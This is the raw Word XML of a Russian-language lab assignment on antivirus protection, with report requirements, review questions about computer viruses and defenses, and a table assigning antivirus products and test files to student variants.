      </w:r>
      <w:r w:rsidR="00222B7F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5050B7AE" w14:textId="43A37157" w:rsidR="00222B7F" w:rsidRDefault="00222B7F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FFC5B" w14:textId="77777777" w:rsidR="00222B7F" w:rsidRPr="00751DC8" w:rsidRDefault="00222B7F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02049" w14:textId="77777777" w:rsidR="00751DC8" w:rsidRPr="00222B7F" w:rsidRDefault="00751DC8" w:rsidP="00222B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B7F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Содержание отчета</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE35860" w14:textId="6942A73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1)</w:t>
      </w:r>
      <w:r w:rsidR="00FB3B58">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00751DC8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Название и цель лабораторной работы;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC23C22" w14:textId="3D15E630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2)</w:t>
      </w:r>
      <w:r w:rsidR="00FB3B58">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00751DC8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Доклад на выбранную по варианту тему;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4989B559" w14:textId="3B343D31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3)</w:t>
      </w:r>
      <w:r w:rsidR="00FB3B58">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00751DC8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Содержимое файла Scan_Log.txt по пункту 1</w:t>
      </w:r>
      <w:r w:rsidR="00FB3B58">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Задания 1</w:t>
      </w:r>
      <w:r w:rsidRPr="00751DC8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Порядка выполнения работы</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42FEFEBC" w14:textId="184698AC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4)</w:t>
      </w:r>
      <w:r w:rsidR="00FB3B58">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00751DC8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Содержание файла Upd_Log.txt по П.2</w:t>
      </w:r>
      <w:r w:rsidR="00FB3B58">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Задания 1</w:t>
      </w:r>
      <w:r w:rsidRPr="00751DC8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Порядка выполнения работы.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B7F3F3F" w14:textId="2F83F046" w:rsid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5</w:t>
      </w:r>
      <w:r w:rsidR="00222B7F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00751DC8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Выводы.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A58099" w14:textId="2F435F40" w:rsidR="00222B7F" w:rsidRDefault="00222B7F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9E2DB" w14:textId="77777777" w:rsidR="00222B7F" w:rsidRPr="00751DC8" w:rsidRDefault="00222B7F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A42A1" w14:textId="77777777" w:rsidR="00751DC8" w:rsidRPr="00222B7F" w:rsidRDefault="00751DC8" w:rsidP="00222B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B7F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7DCB0628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1). Что называется компьютерным вирусом?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B82D7B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2). Какая программа называется "зараженной"?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B5B8C0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3). Что происходит, когда зараженная программа начинает работу?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7D7B56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4). Как может маскироваться вирус?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF16710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lastRenderedPageBreak/>
        <w:t>5). Каковы признаки заражения вирусом?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A0B9BF8" w14:textId="7E70C5C5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B33AF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6). Каковы последствия заражения компьютерным вирусом?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DAAC26C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7). По каким признакам классифицируются компьютерные вирусы?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF1A132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8). Как классифицируются вирусы по среде обитания?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C1CDA9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9). Какие типы компьютерных вирусов выделяются по способу воздействия?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FFBA5B6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10). Что могут заразить вирусы?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1410FE61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11). Как маскируются "невидимые" вирусы?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AFB78BF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12). Каковы особенности самомодифицирующихся вирусов?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C54295A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13). Какие методы защиты от компьютерных вирусов можно использовать?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C3462C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14). В каких случаях применяют специализированные программы защиты от </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0567F615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компьютерных вирусов?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00582CEB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15). На какие виды можно подразделить программы защиты от компьютерных вирусов?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51BFEA11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16). Как действуют программы-детекторы?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A837EF2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17). Что называется сигнатурой?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A9D9F0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18). Всегда ли детектор распознает зараженную программу?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C1AA5BA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19). Каков принцип действия программ-ревизоров, программ-фильтров, программвакцин?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0554ACBC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20). Как выглядит многоуровневая защита от компьютерных вирусов с помощью </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C736BCF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антивирусных программ?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12FBB0EE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21). Перечислите меры защиты информации от компьютерных вирусов.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CBF4DEF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22). Каковы современные технологии антивирусной защиты?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="321DC1DC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23). Каковы возможности антивируса Касперского для защиты файловых серверов? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA2EE50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почтовых серверов?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="179D414A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24). Какие модули входят в состав антивируса Касперского для защиты файловых </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06DE7FA4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систем?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D35C32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25). Каково назначение этих модулей?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6784A4AE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26). Какие элементы электронного письма подвергаются проверке на наличие вирусов?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66AEA217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 xml:space="preserve">27). Как обезвреживаются антивирусом Касперского обнаруженные подозрительные </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548D485C" w14:textId="77777777" w:rsidR="00751DC8" w:rsidRP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или инфицированные объекты?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="223A124B" w14:textId="6970FA58" w:rsidR="00751DC8" w:rsidRDefault="00751DC8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8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>28). Как обновляется база вирусных сигнатур</w:t>
      </w:r>
      <w:r w:rsidR="00E81933">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E40E600" w14:textId="0AC45FC0" w:rsidR="00E81933" w:rsidRDefault="00E81933" w:rsidP="00751D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A02BF" w14:textId="28B6B41C" w:rsidR="00E81933" w:rsidRDefault="00E81933" w:rsidP="00E819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1933">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Варианты заданий к работе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5938"/>
        <w:gridCol w:w="2262"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E81933" w:rsidRPr="00E81933" w14:paraId="5A1E5E07" w14:textId="77777777" w:rsidTr="00AE0348">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1145" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="549F20B8" w14:textId="2B1EDF47" w:rsidR="00E81933" w:rsidRPr="00E81933" w:rsidRDefault="00E81933" w:rsidP="00E819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Вариант </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5938" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="77B71B4A" w14:textId="745C9CA1" w:rsidR="00E81933" w:rsidRPr="00E81933" w:rsidRDefault="00E81933" w:rsidP="00E819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Название антивирусной программы </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2262" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="469EEE07" w14:textId="1FF1D41C" w:rsidR="00E81933" w:rsidRPr="00E81933" w:rsidRDefault="00E81933" w:rsidP="00E819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файла</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E81933" w:rsidRPr="00E81933" w14:paraId="695BAAD2" w14:textId="77777777" w:rsidTr="00AE0348">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1145" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5A0A2A6D" w14:textId="3C37F38D" w:rsidR="00E81933" w:rsidRPr="00E81933" w:rsidRDefault="00E81933" w:rsidP="00E819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38" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="530A896A" w14:textId="0DF28C03" w:rsidR="00E81933" w:rsidRPr="00DD446A" w:rsidRDefault="00DD446A" w:rsidP="00E81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46A">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Dr.Web</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2262" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="181A019D" w14:textId="77777777" w:rsidR="00AE0348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Test_01_01.txt</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="56467DF9" w14:textId="38BCACA4" w:rsidR="00E81933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Test_02_01.doc</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE0348" w:rsidRPr="00E81933" w14:paraId="4D262D7B" w14:textId="77777777" w:rsidTr="00AE0348">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1145" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7CB533AB" w14:textId="4987377F" w:rsidR="00AE0348" w:rsidRPr="00E81933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38" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4E8C3137" w14:textId="145EC45F" w:rsidR="00AE0348" w:rsidRPr="00DD446A" w:rsidRDefault="00E8499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998">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>McAfee VirusScan</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2262" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="610DA65B" w14:textId="148C615A" w:rsidR="00AE0348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Test_01_0</w:t>
            </w:r>
            <w:r w:rsidR="00692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14:paraId="7348DBD3" w14:textId="7CB13576" w:rsidR="00AE0348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Test_02_0</w:t>
            </w:r>
            <w:r w:rsidR="00692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AE0348" w:rsidRPr="00E81933" w14:paraId="0F474721" w14:textId="77777777" w:rsidTr="00AE0348">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1145" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4CAB9D07" w14:textId="6368E3B8" w:rsidR="00AE0348" w:rsidRPr="00E81933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38" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6EB3EB1C" w14:textId="73390143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Антивирус Касперского</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2262" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="54C1B311" w14:textId="49A0B237" w:rsidR="00AE0348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Test_01_0</w:t>
            </w:r>
            <w:r w:rsidR="006923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14:paraId="074F7BA6" w14:textId="566D6916" w:rsidR="00AE0348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Test_02_0</w:t>
            </w:r>
            <w:r w:rsidR="006923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AE0348" w:rsidRPr="00E81933" w14:paraId="42D11762" w14:textId="77777777" w:rsidTr="00AE0348">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1145" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3C807CD4" w14:textId="36BF0EBC" w:rsidR="00AE0348" w:rsidRPr="00E81933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38" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2841A191" w14:textId="2319D8C9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Panda Anti-Virus</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2262" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="15F7A6C7" w14:textId="4FF4738A" w:rsidR="00AE0348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Test_01_0</w:t>
            </w:r>
            <w:r w:rsidR="006923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14:paraId="78DFF544" w14:textId="7FB4FBCE" w:rsidR="00AE0348" w:rsidRPr="00AE0348" w:rsidRDefault="00AE034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>Test_02_0</w:t>
            </w:r>
            <w:r w:rsidR="006923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E0348">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">.doc </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE0348" w:rsidRPr="00E81933" w14:paraId="2214E4AF" w14:textId="77777777" w:rsidTr="00AE0348">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1145" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6A7AD0CF" w14:textId="5AA50402" w:rsidR="00AE0348" w:rsidRPr="00E81933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38" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="04A9769C" w14:textId="519F4BBC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Avast!</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2262" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="53758D13" w14:textId="280BC7A9" w:rsidR="00AC4BDC" w:rsidRPr="00AC4BDC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Test_01_0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14:paraId="7437F73D" w14:textId="3A573AD0" w:rsidR="00AC4BDC" w:rsidRPr="00AE0348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Test_02_0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 xml:space="preserve">.doc </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE0348" w:rsidRPr="00AC4BDC" w14:paraId="0891703B" w14:textId="77777777" w:rsidTr="00AE0348">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1145" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1695DB6D" w14:textId="0797A609" w:rsidR="00AE0348" w:rsidRPr="00E81933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938" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0E0FB3E0" w14:textId="163903D4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AVS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2262" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B745299" w14:textId="7D3672D4" w:rsidR="00AE0348" w:rsidRPr="00AC4BDC" w:rsidRDefault="00AE0348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Test_01_0</w:t>
            </w:r>
            <w:r w:rsidR="00AC4B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  <w:r w:rsidR="00AC4BDC" w:rsidRPr="00AC4BDC">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00AC4BDC"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C4BDC"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</w:t>
            </w:r>
            <w:r w:rsidR="00AC4B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C4BDC"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</w:tr>
      <w:tr w:rsidR="00AE0348" w:rsidRPr="00E81933" w14:paraId="3BD9CB68" w14:textId="77777777" w:rsidTr="00AE0348">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1145" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4E8B4732" w14:textId="5FC94A8F" w:rsidR="00AE0348" w:rsidRPr="00E81933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938" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5037391B" w14:textId="3C1D7248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2262" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="58580E8F" w14:textId="599537A3" w:rsidR="00AC4BDC" w:rsidRPr="00AC4BDC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Test_01_0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14:paraId="7196A8E2" w14:textId="09513FFA" w:rsidR="00AE0348" w:rsidRPr="00AE0348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Test_02_0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AE0348" w:rsidRPr="00E81933" w14:paraId="680212B9" w14:textId="77777777" w:rsidTr="00AE0348">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1145" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5EE485ED" w14:textId="519BCF02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938" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7FF2C81C" w14:textId="7AD9A589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Avira</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2262" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4AADBDF0" w14:textId="3BEF0D60" w:rsidR="00AC4BDC" w:rsidRPr="00AC4BDC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Test_01_0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14:paraId="1FF3D368" w14:textId="3E9B0F81" w:rsidR="00AE0348" w:rsidRPr="00AE0348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Test_02_0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C4BDC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AE0348" w:rsidRPr="00AC4BDC" w14:paraId="7CAE6356" w14:textId="77777777" w:rsidTr="00AE0348">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1145" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="13D70052" w14:textId="61616268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38" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3A341325" w14:textId="39D2D79D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Clam AntiVirus</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2262" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="22FF18FA" w14:textId="0F6FE8B6" w:rsidR="00AC4BDC" w:rsidRPr="00AC4BDC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Test_01_0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14:paraId="7ACF459C" w14:textId="3FC9731A" w:rsidR="00AE0348" w:rsidRPr="00AC4BDC" w:rsidRDefault="00AC4BDC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Test_02_0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.doc</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE0348" w:rsidRPr="00AC4BDC" w14:paraId="1AFD9CC3" w14:textId="77777777" w:rsidTr="00AE0348">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1145" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="323FEB15" w14:textId="2707BBD2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5938" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="592A551A" w14:textId="1F1A3B7D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ClamWin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2262" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="500FEBEC" w14:textId="30076317" w:rsidR="00AC4BDC" w:rsidRPr="00AC4BDC" w:rsidRDefault="00AE0348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Test_01_1</w:t>
            </w:r>
            <w:r w:rsidR="00AC4B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  <w:r w:rsidR="00AC4BDC" w:rsidRPr="00AC4BDC">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00AC4BDC"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C4BDC"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AC4B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C4BDC" w:rsidRPr="00AC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84998">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00E84998" w:rsidRPr="00E84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  <w:p w14:paraId="480FA36E" w14:textId="6F9A5B3B" w:rsidR="00AE0348" w:rsidRPr="00AC4BDC" w:rsidRDefault="00AE0348" w:rsidP="00AC4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0348" w:rsidRPr="00E81933" w14:paraId="7EBADDD7" w14:textId="77777777" w:rsidTr="00AE0348">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1145" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="68EDEEA8" w14:textId="6C9DEA7D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938" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0AE985DD" w14:textId="1871BC39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NOD32</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2262" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3BC1392A" w14:textId="5E297501" w:rsidR="00AE0348" w:rsidRPr="0003031D" w:rsidRDefault="00E8499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Test_01_11.txt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_11. doc</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE0348" w:rsidRPr="00E81933" w14:paraId="1F218E9D" w14:textId="77777777" w:rsidTr="00AE0348">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1145" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="37AA7C8F" w14:textId="1A5239A7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38" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="22794B79" w14:textId="769FCE6E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Trojan Hunter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2262" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="22512C69" w14:textId="33ACC331" w:rsidR="00AE0348" w:rsidRPr="0003031D" w:rsidRDefault="00E84998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 w:rsidR="0003031D" w:rsidRPr="000303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 w:rsidR="0003031D" w:rsidRPr="000303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  <w:tr w:rsidR="00AE0348" w:rsidRPr="00E81933" w14:paraId="6BFC8589" w14:textId="77777777" w:rsidTr="00AE0348">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1145" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3FB305D4" w14:textId="7A56B576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938" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="51F36883" w14:textId="67BBE6D5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VirusBuster</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2262" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="01FD42E9" w14:textId="08F37492" w:rsidR="00AE0348" w:rsidRPr="0003031D" w:rsidRDefault="0003031D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  <w:tr w:rsidR="00AE0348" w:rsidRPr="00E81933" w14:paraId="453CD480" w14:textId="77777777" w:rsidTr="00AE0348">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1145" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="26E0B51F" w14:textId="75AEFAC5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938" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="15913191" w14:textId="5FB4D254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Norton AntiVirus</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2262" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7E275034" w14:textId="66674929" w:rsidR="00AE0348" w:rsidRPr="0003031D" w:rsidRDefault="0003031D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  <w:tr w:rsidR="00AE0348" w:rsidRPr="00E81933" w14:paraId="613BDD4B" w14:textId="77777777" w:rsidTr="00AE0348">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1145" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0E2C1D07" w14:textId="60977D0B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938" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4D6241D3" w14:textId="2200C82F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Windows Live OneCare</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2262" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4D8422E7" w14:textId="64D9F146" w:rsidR="00AE0348" w:rsidRPr="0003031D" w:rsidRDefault="0003031D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  <w:tr w:rsidR="00AE0348" w:rsidRPr="00E81933" w14:paraId="58E050C6" w14:textId="77777777" w:rsidTr="00AE0348">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1145" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="59912B0E" w14:textId="0AA72756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938" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="312D9D04" w14:textId="2A296821" w:rsidR="00AE0348" w:rsidRPr="00DD446A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PC-cillin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2262" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3DED6FA1" w14:textId="507B263C" w:rsidR="00AE0348" w:rsidRPr="0003031D" w:rsidRDefault="0003031D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  <w:tr w:rsidR="00AE0348" w:rsidRPr="00E81933" w14:paraId="770483C2" w14:textId="77777777" w:rsidTr="00AE0348">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1145" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="53F6EF40" w14:textId="1DDA605B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938" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="43454177" w14:textId="1D1161D5" w:rsidR="00AE0348" w:rsidRPr="00CB3075" w:rsidRDefault="00CB3075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075">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>F-Pro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262" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="52ED5C8E" w14:textId="27721C3B" w:rsidR="00AE0348" w:rsidRPr="0003031D" w:rsidRDefault="0003031D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  <w:tr w:rsidR="00AE0348" w:rsidRPr="00E81933" w14:paraId="1A78B86D" w14:textId="77777777" w:rsidTr="00AE0348">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1145" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="534C99FA" w14:textId="47DE886F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938" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3CBC007C" w14:textId="01CBE8F9" w:rsidR="00AE0348" w:rsidRPr="00DD446A" w:rsidRDefault="00141712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712">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>F-Secure Anti-Virus</w:t>
